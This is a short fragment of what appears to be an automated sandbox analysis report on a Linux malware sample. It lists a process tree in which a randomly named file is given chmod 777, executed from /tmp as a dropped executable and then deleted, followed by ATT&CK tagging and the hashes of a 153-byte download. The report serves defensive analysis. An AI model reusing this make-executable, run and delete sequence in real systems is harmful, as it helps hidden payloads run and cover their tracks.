/bin/chmodchmod 777 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- File and Directory Permissions Modification
PID:1001
-
-
/tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe./p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵
- Executes dropped EXE
PID:1002
-
-
/bin/rmrm p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe2⤵PID:1003
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97